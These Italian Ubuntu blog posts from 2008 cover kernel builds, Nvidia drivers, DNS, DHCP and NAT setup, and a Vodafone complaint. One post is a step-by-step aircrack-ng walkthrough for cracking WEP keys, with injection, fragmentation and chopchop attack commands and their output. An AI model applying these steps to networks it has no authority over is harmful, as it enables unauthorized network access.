Patch per mac80211 fragmentation e speed-up

•Novembre 19, 2008 • Lascia un Commento

Netcontroller3D ha rilasciato una patch per le schede intel 4965-5000, con la quale è possibile l’attacco a frammentazione e aumenta la velocità dell’injection. Per installarla entriamo nella cartella dei driver compat-wireless e digitiamo:

wget http://patches.aircrack-ng.org/mac80211_2.6.28-rc4-wl_frag+ack_v3.patch
patch -p1 < mac80211_2.6.28-rc4-wl_frag+ack_v2.patch

ora possiamo installarli con il classico

make
sudo make install

Fonte: http://tinyshell.be/aircrackng/forum/index.php?topic=3954.new#new

Pubblicato in Ubuntu
Tag: , , , , , , , , ,

Installare l’ultima versione di compiz fusion direttamente dal git

•Novembre 16, 2008 • Lascia un Commento

In questa guida verrà spiegato come installare lultima versione di compiz, con tutti gli ultimi plugin compresi quelli in fase di sviluppo (ad esempio per avere la neve o le foglie che cadono). Per prima cosa scarichiamo lo script di omega per scaricare tutti i sorgenti, compilarli e installarli.

sudo apt-get install git-core
sudo apt-get remove compiz*
sudo git clone git://anongit.compiz-fusion.org/users/omega/scripts

ora entriamo nella cartella scripts

cd scripts

e avviamo lo script per la rimozione di compiz, il controllo delle dipendenze per la compilazione e infine installazione di compiz

sudo ./git-compiz --purge
sudo ./git-compiz --check-dep
sudo ./git-compiz

ora avremo l’ultima versione del compiz installata, per aggiornarlo alle versioni future basta avviare

sudo ./git-compiz

dalla cartella scripts.

Grazie mille ad omega per il fantastico script auto aggiornante.

Pubblicato in Ubuntu

Vodafone internet key: una truffa

•Novembre 13, 2008 • 34 Commenti

Scrivo questo articolo per raccontarvi la mia esperienza con la vodafone internet key, nel mio caso la huawei E172. Esperienza fino a domenica quasi soddisfaciente, da lunedì per niente.
Spieghiamo però tutto dall’inizio.
Ho acquistato la chiavetta mediante abbonamento assieme a vodafone casa, quindi sono inclusi i weekend gratis (chi me l’ha venduto ha detto anche i festivi, che invece non sono inclusi) ad una cifra di 20€ al mese (a mio parere onesta). All’inizio ero felice, passando da un 56k ad una semi-adsl, che mi permetteva di raggiungere oltre i 350 kbyte/s in download e i 50 kbyte/s in upload, velocità secondo me ottime che hanno superato di molto le mie aspettative. Dopo qualche settimana inizia il primo problema, le immagini.
Come detto in precendenza la velocità in download è molto alta, ma le immagini erano molto lente nel caricamento.
Spiegazione tecnica: il gateway vodafone analizzava le pagine dei siti che andavo ad aprire, cambiava l’url delle immagini in modo da farle caricare dai server vodafone che provvedevano alla compressione e poi al successivo invio, cosa totalmente inutile vista la mia velocità di download e che anzi rallentava di molto la navigazione. Come se non bastasse a causa della natura di certi siti (msn spaces) molte immagini non venivano aperte in quanto cambiando l’url non erano accessibili dal server vodafone per questioni di sicurezza. Cosa che ho risolto in parte utilizzando opera, il quale mi dava l’indirizzo esatto dell’immagine, con il contro che però opera è molto meno compatibile con numerosi siti (il sito della posta dell’uni non veniva aperto).
Ho quindi chiamato il 190, per una decina di volte, i cui operatori (incompetenti e maleducati) non sapendo cosa dirmi mi chiudevano il telefono mentre parlavo. Ho quindi mandato 6-7 e-mail alla vodafone, dicendo che avevo chiamato numerose volte ecc ecc..Quando ho poi parlato di altri operatori mi ha chiamato una operatrice, molto istruita su come funzioni una rete, le ho spiegato il mio problema e dopo qualche giorno il problema non c’era più. :D
Da quella volta (aprile-maggio) nessun problema, tutta l’estate a scaricare giga e giga ogni weekend fino a questo lunedì.
Mi connetto normalmente ma noto che la connessione è molto lenta, i download non superano i 30 kbyte/s. La cosa mi è sembrata molto strana in quanto la zona è coperta da hsdpa con 4 tacche su 5, la luce della chiavetta è sempre azzurra (connesso con hsdpa), ma la connessione era lentissima, come limitata, visto che i download partivano subito e schizzavano fino ai 30kB/s, e il ping era nella norma. Ho quindi cercato su internet ed ho scoperto che nel contratto vodafone c’è questa piccola ma bastardissima clausola:

Al fine di evitare fenomeni di congestione della rete e per garantirne l'integrita`, consentendo l'accesso contemporaneo da parte di tutti i clienti ai servizi di connettività, Vodafone si riserva il diritto di verificare l'eventuale utilizzo anomalo del servizio e di sospenderne in tutto od in parte l`erogazione, applicando, ove necessario, meccanismi temporanei e non discriminatori di limitazione all'uso continuativo e/o intensivo delle risorse di rete disponibili.

In pratica la vodafone a chi scarica troppo limita la banda a tempo indeterminato, ho quindi subito mandato una mail alla quale non ho ancora ricevuto risposta, seguirà a breve fax con raccomandata a/r e in caso estremo tramite raccomandata la risoluzione del contratto senza penale vista la scarsità del servizio. Non è possibile che scrivano dappertutto traffico illimitato e poi ti limitano la banda senza aver ne dato delle indicazioni sui tipi di “abusi” ne sui termini di sospensione completa o in parte del servizio. Il tutto chiaramente senza un minimo di trasparenza. Come si vede da questo articolo la cosa è molto popolare ma vodafone continua a non dare risposte.

Vi aggiornerò su eventuali cambiamenti o risoluzioni.

PS: ho già iniziato a vedere in giro di altre offerte, qualcuno sa se la versione della tre da 100 ore al mese ha problemi del genere? :D grazie

Leggete qua:
Vodafone Italia chiude il semestre al 30 settembre 2008 con ricavi da servizi pari a 4.196 milioni di euro (+8,2% e +0,9% su base organica) anche grazie al contributo dato dall’acquisizione di Tele2. Il margine operativo lordo si attesta a 1.950 milioni di euro (-1,7% e -2,6% su base organica) ‘a causa dei costi e degli investimenti sostenuti per il lancio dei nuovi servizi di telefonia fissa e per l’acquisizione di clientela alto valore in abbonamento, sia business che consumer’ spiega la nota che accompagna i risultati.
‘I risultati del semestre, ottenuti in un contesto economico non facile, confermano la validita’ del nostro percorso basato sulla centralita’ del cliente e sulla innovazione nella telefonia mobile e fissa – ha commentato l’amministratore delegato di Vodafone Italia, Paolo Bertoluzzo – La crescita nella banda larga mobile e nei servizi di rete fissa ha bilanciato il calo dei ricavi nel mobile tradizionale, dovuto ad una competizione sempre piu’ serrata’. I clienti mobili sono diventati 30.182.000 (+3,5%) con clienti abbonati che aumentano del 34%. Nel semestre sono stati lanciati i nuovi servizi di banda larga fissa Vodafone, che affiancano l’offerta di Tele2: i clienti complessivi sono pari a 656 mila in crescita del 45,7% su base organica rispetto a settembre dello scorso anno.
Vodafone conferma ‘l’impegno a investire per lo sviluppo della propria rete di nuova generazione, sia mobile che fissa’ sottolinea Bertoluzzo che ribadisce la sua critica agli impegni presi da Telecom sull’accesso alla Rete e chiede una separazione funzionale. ‘E’ indispensabile rimuovere i numerosi ostacoli alla concorrenza nel fisso, creando condizioni di vera parita’ di accesso e reale contendibilita’ dei clienti, tuttora non garantite. Gli impegni presentati dall’ex-monopolista risultano ancora inadeguati, solo una separazione funzionale puo’ assicurare pari condizioni competitive. In questo contesto desta preoccupazione che l’operatore dominante possa presentare una richiesta di aumento del canone dei servizi in unbundling, che ridurrebbe ancor di piu’ la competitivita’ nel mercato’.

Fonte: http://www.aduc.it/dyn/tlc/noti.php?id=240003

cioè, hanno sempre più clienti (30.182.000, e in Italia siamo in 59.762.887, tenete conto dei potenziali usufruitori) e sempre più un servizio di m***a.

Pubblicato in Ubuntu
Tag: , , , , , , , , , , , , , , , , ,

Confronto tra cpu generica e core2 nel kernel

•Novembre 9, 2008 • Lascia un Commento

Se volete aumentare la velocità del vostro pc permettendo di sfruttare appieno le potenzialità del vostro core2duo (ormai presente in quasi tutti i portatili) potete modificare una piccola impostazione durante la compilazione del kernel (come spiegato qui).

In pratica durante la configurazione del kernel con “make xconfig” selezionate la voce

Processor type and features -> Processor family -> Core 2/newer Xeon

Come mostrato in questi screenshot

Selezionando cpu generica come processore

Selezionando cpu generica come processore

Selezionando Core 2/newer Xeon come processore

Selezionando Core 2/newer Xeon come processore

come vedete utilizzando il core2/newer Xeon il carico di lavoro viene redistribuito in modo più efficiente fra i due core, il che permette anche di poter utilizzare magari una frequenza più bassa pur avendo le stesse prestazioni, quindi avere consumi minori.

Pubblicato in Ubuntu
Tag: , , , , , , , ,

Crack di una rete wep

•Novembre 9, 2008 • Lascia un Commento

In questo articolo verrà spiegato come trovare la chiave di una rete wep. Questo è l'hardware da me utilizzato:

router Dlink DIR-635 mac: 00:1B:11:ED:2F:2C canale 4
card Intel 4965 agn su Asus G2s Ubuntu 8.10 kernel 2.6.28-rc3

Esistono diversi metodi per poter trovare la chiave wep, tutti però consistono nella generazione di pacchetti di dati (ivs) in modo da aumentare il traffico di rete, in quanto ne servono più o meno 10000-15000 per permettervi di trovare una chiave di rete a 10 cifre. Per poter fare ciò dovete avere una scheda wireless che permetta l'injection (vi consiglio di utilizzare l'ultimo kernel disponibile in quanto contiene gli ultimi driver per la vostra scheda wireless, o se avete una scheda come la mia il metodo più veloce è

# wget http://www.intellinuxwireless.org/iwlwifi/downloads/iwlwifi-4965-ucode-228.57.2.21.tgz
# tar zxf iwlwifi-4965-ucode-228.57.2.21.tgz
# cd iwlwifi-4965-ucode-228.57.2.21
# sudo cp * /lib/firmware/
# cd ..
# wget http://wireless.kernel.org/download/compat-wireless-2.6/compat-wireless-2.6.tar.bz2
# tar xjf compat-wireless-2.6.tar.bz2
# cd compat-wireless-2008-10-31 \\(mettete la directory appena creata)
# make
# sudo make install
# sudo reboot -r now

). Per prima cosa dobbiamo aver installato la suite aircrack, se avete come me ubuntu digitate nel terminale

# sudo apt-get install aircrack-ng

ora troviamo la rete che vogliamo crackare. Disabilitiamo il wireless del network manager e nel terminale digitiamo

# sudo su

per entrare in modalità superutente, ora avviamo un'interfaccia per la monitor mode,

# airmon-ng start wlan0 (se la vostra interfaccia wireless è wlan0)

e otterremo:

Interface    Chipset        Driver

wlan0            iwlagn - [phy0]
(monitor mode enabled on mon0)

ora digitiamo

# airodump-ng mon0

CH  4 ][ Elapsed: 52 s ][ 2008-11-09 10:29

BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:1B:11:ED:2F:2C  232      171        2    0   4  54. WEP  WEP         dlink

BSSID                     STATION               PWR   Rate    Lost  Packets Probes

00:1B:11:ED:2F:2C  00:02:72:64:D1:F2  212    54-54     0        2

come vedete è stato trovato il router con la chiave wep sul canale 4 ma i pacchetti data son troppi pochi per poter trovare la chiave, è stato inoltre trovato un client connesso al router che però non genera pacchetti di dati. Come vedremo ci sono diversi tipi di attacchi, non tutti però funzionano nel caso non ci siano client connessi. Come già spiegato in precedenza gli attacchi permettono di generare i pacchetti di dati che verranno poi catturati e processati per poter trovare la chiave di rete, alla fine di ognuno di questi rimanderò alla parte finale dell'articolo in cui verrà spiegato come catturare i dati e trovare la chiave di rete.
Possiamo iniziare.

Per prima cosa impostiamo il canale sul quale fare gli attacchi, in questo caso il canale 4.

# airodump-ng --channel 4 mon0

ora possiamo tranquillamente chiudere airodump-ng in quanto non utilizzato.

Interactive frame selection

# aireplay-ng -2 -b 00:1B:11:ED:2F:2C mon0

in cui -b è il mac dell'access point, ora dovremmo avere un output del genere

No source MAC (-h) specified. Using the device MAC (00:13:E8:12:47:07)
Read 11 packets...

Size: 107, FromDS: 0, ToDS: 1 (WEP)

BSSID  =  00:1B:11:ED:2F:2C
Dest. MAC  =  00:1B:11:ED:2F:2C
Source MAC  =  00:02:72:64:D1:F2

0x0000:  0841 2700 001b 11ed 2f2c 0002 7264 d1f2  .A'...../,..rd..
0x0010:  001b 11ed 2f2c 103e 370d 0000 314f d4ff  ..../,.>7...1O..
0x0020:  91eb d898 0731 5f06 d03d 5e32 3548 367d  .....1_..=^25H6}
0x0030:  6c64 ab3d 2425 eae6 dc2d 97ff 53e7 880b  ld.=$%...-..S...
0x0040:  25d6 936a 6338 e334 4809 1b6f 21b3 3383  %..jc8.4H..o!.3.
0x0050:  80eb 7806 b261 497f 1705 2ce1 3aa3 e682  ..x..aI..,.:...
0x0060:  b801 539a f194 7472 045b dd              ..S...tr.[.

Use this packet ? y

Saving chosen packet in replay_src-1109-103852.cap
You should also start airodump-ng to capture replies.

Sent 1400 packets...(499 pps)

questo vuol dire che il programma sta già iniettando pacchetti a una velocità di 500 pacchetti per secondo, ora possiamo passare alla cattura come spiegato più avanti, chiaramente lasciando aperto il programma che sta iniettando altrimenti non avremo pacchetti dati da catturare.
Se questo non accade possiamo provare un altro attacco.

Standard ARP-request replay

# aireplay-ng -3 -b 00:1B:11:ED:2F:2C mon0

-b è sempre il mac dell'access point, e l'output dovrebbe essere questo:

No source MAC (-h) specified. Using the device MAC (00:13:E8:12:47:07)
10:44:23  Waiting for beacon frame (BSSID: 00:1B:11:ED:2F:2C) on channel 4
Saving ARP requests in replay_arp-1109-104423.cap
You should also start airodump-ng to capture replies.
Read 6672 packets (got 1 ARP requests and 2154 ACKs), sent 2156 packets...(499 pps)

Come nell'attacco precedente sta iniettando e possiamo andare alla cattura, chiaramente lasciando aperto il programma che sta iniettando altrimenti non avremo pacchetti dati da catturare.
Questi due attacchi funzionano solo se ci sono client connessi altrimenti è molto difficile che possano funzionare. Ora proviamo due attacchi utilizzati maggiormente quando non ci sono client connessi, per questo dobbiamo quindi fare un fakeauth per poterci connettere. Quindi diamo il comando

# aireplay-ng -1 0 -e dlink -a 00:1B:11:ED:2F:2C mon0

in cui -e è il nome della rete wireless e -a il mac dell'access point

(nel mio caso visto che il fakeauth di aircrack-ng non funziona dobbiamo creare un file wpa_supplicant.crack e inseriamo

network={
ssid="dlink"
key_mgmt=NONE
wep_key0="fakeauth"
}

ora da console digitiamo

# wpa_supplicant -Dwext -iwlan0 -c wpa_supplicant.crack
CTRL-EVENT-SCAN-RESULTS
Trying to associate with 00:1b:11:ed:2f:2c (SSID='dlink' freq=2427 MHz)
Associated with 00:1b:11:ed:2f:2c
CTRL-EVENT-CONNECTED - Connection to 00:1b:11:ed:2f:2c completed (auth) [id=0 id_str=]

lasciamo aperta la connessione e apriamo un nuovo terminale o una nuova scheda e entriamo anche qui in modalità superutente con "sudo su".
Nei prossimi due attacchi la tecnica è leggermente diversa in quanto questi attacchi permettono di ottenere un pacchetto PRGA (pseudo random genration algorithm) poi utilizzato per creare pacchetti ARP da iniettare per creare pacchetti dati.

Fragmentation attack

Questo attacco è utilizzabile con i router vecchi, con quelli nuovi che hanno una protezione migliore non funziona.

# aireplay-ng -5 -b 00:1b:11:ed:2f:2c mon0
No source MAC (-h) specified. Using the device MAC (00:13:E8:12:47:07)
11:01:37  Waiting for beacon frame (BSSID: 00:1B:11:ED:2F:2C) on channel 4
11:01:37  Waiting for a data packet...
Read 29 packets...

Size: 68, FromDS: 1, ToDS: 0 (WEP)

BSSID  =  00:1B:11:ED:2F:2C
Dest. MAC  =  FF:FF:FF:FF:FF:FF
Source MAC  =  00:1B:11:ED:2F:2C

0x0000:  0842 0000 ffff ffff ffff 001b 11ed 2f2c  .B............/,
0x0010:  001b 11ed 2f2c 307d a7ee e700 8027 36d2  ..../,0}.....'6.
0x0020:  a8fb aae1 be6e 7be4 7b05 f3d2 b76d b20a  .....n{.{....m..
0x0030:  3634 3a6e 969e 4519 4e51 c519 bbe3 dc9a  64:n..E.NQ......
0x0040:  8a86 66c2                                ..f.

Use this packet ? y

Saving chosen packet in replay_src-1109-110140.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-1109-110150.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

Ora abbiamo il pacchetto xor per generare il pacchetto ARP da iniettare. Prima però nel caso questo attacco non sia andato a buon fine utilizziamo un altro attacco.

Chopchop attack

# aireplay-ng -4 -b 00:1b:11:ed:2f:2c mon0

Read 13630 packets...

Size: 357, FromDS: 1, ToDS: 0 (WEP)

BSSID  =  00:1B:11:ED:2F:2C
Dest. MAC  =  00:13:E8:12:47:07
Source MAC  =  00:1B:11:ED:2F:2C

0x0000:  884a 2c00 0013 e812 4707 001b 11ed 2f2c  .J,.....G...../,
0x0010:  001b 11ed 2f2c 7002 0000 0965 5300 55f7  ..../,p....eS.U.
0x0020:  1344 9698 24c9 8b1a 377f 6737 c81c 7a3a  .D..$...7g7..z:
0x0030:  922b a762 0e65 41dd ddfb c6cc 678d eb7d  .+.b.eA.....g..}
0x0040:  7010 4a51 38fe cab3 cd03 18e2 f153 2469  p.JQ8........S$i
0x0050:  70ae 3ce8 debe b3a2 7240 0bc3 0507 b239  p.<.....r@.....9
0x0060:  476e 76fc f759 a6f4 d94e 8f0a 8cd0 6163  Gnv..Y...N....ac
0x0070:  556b bd1f 4222 2a42 15c9 92be d444 1507  Uk..B"*B.....D..
0x0080:  962e 0cfc 6874 7d24 6fe2 2ed6 d1cc 79d9  ....ht}$o.....y.
0x0090:  08fe d072 3760 8c38 3cff ad93 75cb b043  ...r7`.8<...u..C
0x00a0:  6a83 6bd4 c590 df44 a67a 3e67 ec9f 524f  j.k....D.z>g..RO
0x00b0:  bc32 f5be 5f47 ccd0 dc65 9ebe 5415 f1fd  .2.._G...e..T...
0x00c0:  c985 8cb9 7843 5048 af39 ccf3 496e adef  ....xCPH.9..In..
0x00d0:  0607 a4c9 3ff4 680d 2e61 4230 c3c4 71ac  ....?.h..aB0..q.
--- CUT ---

Use this packet ? y

Saving chosen packet in replay_src-1109-110412.cap

Offset  354 ( 0% done) | xor = C2 | pt = E2 |  914 frames written in 15538ms
Offset  353 ( 0% done) | xor = 17 | pt = B1 | 1532 frames written in 26047ms
Offset  352 ( 1% done) | xor = D4 | pt = A0 | 1852 frames written in 31491ms
Offset  351 ( 1% done) | xor = 2C | pt = 33 | 2088 frames written in 35486ms
Offset  350 ( 1% done) | xor = 82 | pt = 0A | 1181 frames written in 20090ms
Offset  349 ( 2% done) | xor = 1E | pt = 0D | 1359 frames written in 23093ms
Offset  348 ( 2% done) | xor = AF | pt = 0A | 1843 frames written in 31335ms
Offset  347 ( 2% done) | xor = 53 | pt = 0D | 1022 frames written in 17371ms
Offset  346 ( 3% done) | xor = 82 | pt = 30 | 1296 frames written in 22028ms
Offset  345 ( 3% done) | xor = B0 | pt = 20 | 1432 frames written in 24359ms
Offset  344 ( 3% done) | xor = E5 | pt = 3A | 1158 frames written in 19675ms
Offset  343 ( 4% done) | xor = 86 | pt = 68 | 2025 frames written in 34424ms
Offset  342 ( 4% done) | xor = 88 | pt = 74 | 2174 frames written in 36958ms
Offset  341 ( 4% done) | xor = 62 | pt = 67 | 1510 frames written in 25670ms
...

ora attendete affinchè l'offset arriva a 0, e creerà un altro file .xor da poter utilizzare per la creazione di pacchetti ARP.

Creazione del pacchetto ARP

# packetforge-ng -0 -a 00:1b:11:ed:2f:2c -h 00:13:e8:12:47:07 -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-1024-205255.xor -w arp-request

in cui

-a è il mac dell'ap

-h è il mac della vostra scheda wireless

-k è l'indirizzo di destinazione (per maggiore compatibilità)

-l è l'indirizzo di partenza

e darà

Wrote packet to: arp-request

Iniettare il pacchetto ARP

Vediamo come iniettare il pacchetto creato con packetforge-ng,

# aireplay-ng -2 -r arp-request mon0

Il sistema vi chiederà se utilizzare il pacchetto, digitate y e il programma inizierà ad iniettare i pacchetti.

Ora vi dirò come catturare i pacchetti, tecnica finale per trovare la chiave di rete. Questo dovete farlo indipendentemente da quale tecnica abbiate utilizzato.

Cattura dei pacchetti

# airodump-ng -c 4 --bssid 00:1b:11:ed:2f:2c -w capture mon0

-c 4 è il canale

--bssid è il mac dell'access point

-w capture è il file in cui salvare gli ivs

mon0 è l'interfaccia

e otterremo

CH  4 ][ Elapsed: 36 s ][ 2008-11-09 11:17

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:1B:11:ED:2F:2C  239 100      346    15704  443   4  54. WEP  WEP         dlink

BSSID              STATION            PWR   Rate  Lost  Packets  Probes

00:1B:11:ED:2F:2C  00:13:E8:12:47:07    0   0- 1    11    31371  dlink

ora che il programma sta scrivendo nel file capture* i pacchetti di dati dobbiamo avviare il programma per decriptare i pacchetti e ottenere la chiave.

NOTA: più pacchetti ci sono più veloce sarà il processo.

Il programma ha salvato i dati nel file capture-01.cap, da console diamo

# aircrack-ng capture-01.cap

e avremo

Opening capture-01.cap

Read 47198 packets.

#  BSSID              ESSID                     Encryption

1  00:1B:11:ED:2F:2C  dlink                     WEP (15751 IVs)

Choosing first network as target.

Opening capture-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 15751 ivs.

Aircrack-ng 1.0 rc1

[00:00:00] Tested 119 keys (got 15751 IVs)

KB    depth   byte(vote)
0    1/  2   12(22784) 48(20480) EE(19968) 52(19456) 74(19456) BF(19456) F1(19456) BD(19200) DB(19200) E3(19200) F3(19200) 41(18944) 55(18944) 56(18944)
1    1/  3   34(21760) CE(21504) 1F(20992) 54(20224) 1A(19968) E3(19968) E9(19712) 00(19456) A0(19456) FD(19456) 0C(19200) C2(19200) 35(18944) AB(18944)
2    1/  2   56(22016) 19(20480) 1B(20480) E3(20480) F8(20480) 6F(19712) A3(19712) B5(19712) CF(19712) E5(19712) 09(19456) C1(19456) DA(19456) 4A(18944)
3    0/  1   78(23552) F0(22528) 2F(20992) 2D(20480) 96(20480) FF(20480) 4C(20224) 77(19968) 1B(19712) 3F(19712) 9F(19456) FA(19456) D4(19200) F6(19200)
4    2/ 10   BC(19456) 17(19200) 81(19200) BE(19200) C0(19200) 28(18944) 2A(18944) A4(18944) BD(18944) 08(18688) 27(18688) 3C(18688) 4D(18688) 9A(18688)

KEY FOUND! [ 12:34:56:78:90 ]
Decrypted correctly: 100%

Come vedete avete trovato la chiave, che con 15000 pacchetti dati l'avete trovata in 0.588 secondi.

Pubblicato in Ubuntu
Tag: , , , , , , , , ,

Condividere la propria connessione ad internet sulla rete di casa

•Ottobre 28, 2008 • Lascia un Commento

Per prima cosa è necessario avviare un server dhcp come indicato da questa guida. Oppure dovete impostare come gateway e server dns il proprio pc. Per installare un server dns leggette qua. Ora aprite un terminale e inserite i comandi

sudo su
iptables -t nat -A POSTROUTING -o ppp0 -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward

mettendo al posto di ppp0 eth0 se siete connessi ad internet con il cavo ethernet, wlan0 se siete connessi via wireless. Ppp0 è di solito utilizzato quando siete connessi via usb.

Pubblicato in Ubuntu
Tag: , , ,

Installazione di un server dns su ubuntu

•Ottobre 28, 2008 • Lascia un Commento

L’installazione è semplicissima, basta eseguire da terminale

sudo apt-get install bind9

in questo modo verrà installato un server dns, avviato automaticamente all’avvio e già configurato per risolvere i nomi prendendo come sorgente i server principali.

PS: può essere utile far ascoltare il server dns su tutti gli ip in modo dinamico (senza il riavvio), per fare ciò diamo il comando “sudo gedit /etc/bind/named.conf.options” e aggiungiamo prima di }; la riga

listen-on { any; };

in modo che il file risulti una cosa del tipo

options {
directory "/var/cache/bind";

// If there is a firewall between you and nameservers you want
// to talk to, you may need to fix the firewall to allow multiple
// ports to talk.  See http://www.kb.cert.org/vuls/id/800113

// If your ISP provided one or more IP addresses for stable
// nameservers, you probably want to use them as forwarders.
// Uncomment the following block, and insert the addresses replacing
// the all-0's placeholder.

// forwarders {
//     0.0.0.0;
// };

auth-nxdomain no;    # conform to RFC1035
listen-on-v6 { any; };
listen-on { any; };
};

ora riavviamo il servizio con

sudo /etc/init.d/bind9 restart

Pubblicato in Ubuntu
Tag: , ,

Installazione e configurazione di un server dhcp su ubuntu

•Ottobre 28, 2008 • Lascia un Commento

Questo articolo spiega come installare e configurare da zero un server dhcp su ubuntu. Per prima cosa apriamo un terminale e diamo il comando

sudo apt-get install gadmin-dhcpd

ora andiamo su applicazioni->strumenti di sistema->gadmin-dhcpd

Questo è quello che vi apparirà

Frontend for dhcpd configuration

Frontend for dhcpd configuration

ora se volete ad esempio impostare il server in modo che assegni indirizzo ai pc collegati in rete mediante cavo copiate la configurazione come da immagine. Importante: la vostra scheda di rete deve avere come ip 192.168.0.1 e netmask 255.255.255.0. Se volete impostare questi dati eseguite su terminale:

sudo ifconfig eth0 192.168.0.1/24 up

Pubblicato in Ubuntu
Tag: , , ,

Aggiornamento driver Nvidia per funzionare con kernel 2.6.28-rc2 2.6.28-rc3

•Ottobre 27, 2008 • 5 Commenti

Questo articolo è per chi come me ha una scheda video nvidia e non ha la possibilità di compilare i driver per poterli utilizzare con il nuovo kernel 2.6.28.

Per prima cosa scarichiamo i driver da qui e poi scarichiamo la patch da qui.

Ora entriamo in un terminale e raggiungiamo la cartella in cui abbiamo scaricato i driver e la patch e diamo il comando:

# ./NVIDIA-Linux-x86-177.80-pkg1.run --apply-patch NVIDIA_kernel-177.80-2990799.diff.txt

questo permette di patchare i driver x il nuovo kernel e creerà il file NVIDIA-Linux-x86-177.80-pkg1-custom.run. Ora dobbiamo quindi installare i driver, però dobbiamo quindi disinstallare quelli preesistenti. Entriamo in sistema->amministrazione->gestore pacchetti synaptic e cerchiamo tutti i pacchetti che iniziamo con “nvidia” e rimuoviamoli. Ora entriamo nel nuovo kernel, attendiamo che il gdm dia errore, diamo ok due volte e appena ci ritroviamo alla schermata di login premiamo ctrl-alt-F1, entriamo come root (prima potete impostare la password dell’utente root da terminale con il comando “sudo passwd root”). Una volta entrati come root diamo

# /etc/init.d/gdm stop

per chiudere il server x. Ora entriamo nella cartella dove c’è il file NVIDIA-Linux-x86-177.80-pkg1-custom.run precedentemente creato e diamo da console

# ./NVIDIA-Linux-x86-177.80-pkg1-custom.run

completiamo l’installazione e riavviamo con

# shutdown -r now

Pubblicato in Ubuntu
Tag: , , , , , , , , ,

Compilazione nuovo kernel 2.6.28-rc2 -rc3 -rc4 -rc5 -rc6

•Ottobre 27, 2008 • 5 Commenti

Prefazione: la guida seguente è stata fatta utilizzando il kernel 2.6.28-rc2, ma testata e funzionante anche per il kernel 2.6.28-rc3 -rc4 -rc5 -rc6

Ecco alcuni semplici passi su come poter utilizzare il nuovissimo kernel 2.6.28-rc2 sulla vostra distribuzione ubuntu.

Sistema utilizzato:

Asus G2s, ubuntu 8.10 intrepid ibex

Nota: se utilizzate come me una scheda video nvidia DOVETE utilizzare una patch, il tutorial è scritto qui.

Per prima cosa apriamo un terminale ed inseriamo il comando

sudo su

per entrare nell’utente root utilizzando la nostra password, altrimenti se conosciamo la password dell’utente root usiamo semplicemente

su

(mentre se volete settare la password di root utilizzate sudo passwd root).

Per prima cosa assicuriamoci di avere una connessione ad internet funzionante e aggiorniamo la lista dei pacchetti.

apt-get update

ora installiamo i pacchetti necessari per una corretta compilazione del kernel.

apt-get install build-essential kernel-package libncurses5-dev fakeroot wget bzip2 qt3-apps-dev

Ora che abbiamo i prerequisiti per poter compilare il kernel scarichiamo i sorgenti nella directory giusta

cd /usr/src
wget http://www.kernel.org/pub/linux/kernel/v2.6/testing/linux-2.6.28-rc2.tar.bz2
tar xjf linux-2.6.28-rc2.tar.bz2
ln -s linux-2.6.28-rc2 linux
cd /usr/src/linux

in questo modo abbiamo scaricato i sorgenti, scompattati e creato un link per accederci più velocemente. Ora che siamo nella cartella /usr/src/linux diamo il comando

make xconfig

per poter impostare il proprio kernel personalizzato, per prima cosa è consigliabile caricare il file di configurazione del proprio kernel, per fare ciò andiamo su file e apriamo il file di configurazione che troviamo nella cartella /boot nel mio caso config-2.6.27-7-generic e nel vostro il file corrispondente al kernel che avete utilizzato. L’unica cosa che ho cambiato nella configurazione è aver settato il tipo di cpu su core2 (avendo un core2duo), per fare ciò ho cercato mediante il comando find core2 e settato la cpu. Ora possiamo fare save configuration e uscire.
Tornati quindi alla console possiamo iniziare la compilazione usando i comandi

make-kpkg clean
make-kpkg –initrd –append-to-version=-custom kernel_image kernel_header

inserendo al posto di custom quello che si vuole da aggiungere al nome del kernel.
Se avete un core 2 duo o un core quad possiamo far utilizzare tutti i core della nostra cpu dando il comando

export CONCURRENCY_LEVEL=X

mettendo al posto di X il proprio numero di core (nel mio caso 2). Attendiamo di aver finito di compilare il kernel e torniamo nella cartella /usr/src/ e installiamo il tutto con i comandi

dpkg -i linux-headers-2.6.28-rc2-extreme_2.6.28-rc2-extreme-10.00.Custom_i386.deb
dpkg -i linux-image-2.6.28-rc2-extreme_2.6.28-rc2-extreme-10.00.Custom_i386.deb

e possiamo trovare il nuovo kernel nel grub al prossimo riavvio.

In caso di problemi, dubbi e domande non esitate a scrivere. Spero di essere stato utile.

Pubblicato in Ubuntu
Tag: , , , , , , , , , ,